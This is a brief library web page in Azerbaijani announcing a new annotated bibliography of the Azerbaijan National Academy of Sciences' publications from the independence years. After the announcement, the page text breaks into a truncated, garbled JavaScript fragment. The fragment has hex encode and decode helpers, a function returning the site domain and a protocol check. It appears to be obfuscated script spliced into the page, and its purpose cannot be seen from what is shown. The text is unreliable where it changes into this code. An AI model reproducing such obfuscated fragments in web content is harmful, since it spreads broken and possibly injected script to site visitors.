Zəngilan rayon Mərkəzi kitabxanası

Zəngilan rayon MKS

Yeni kitablar
Müstəqillik illərində Azərbaycan milli elmlər akademiyasının Elmi Nəşrləri (Annotasiyalı biblioqrafik göstərici)
7 Dekabr , 2015

Biblioqrafik göstəricidə Azərbaycan Milli Elmlər Akamediyasında çalışan alimlərin, görkəmli elm və mədəniyyət xadimlərinin müstəqillik illərində müxtəlif sahələr üzrə apardıqları tədqiqatların nəticələrini əks etdirən kitab vəxarici dillərdə daxil olan ədəbiyyat bir neçə bölmədə sistemli şəkildə və annotasiya ilə təqim olunub.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "libraries.az"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e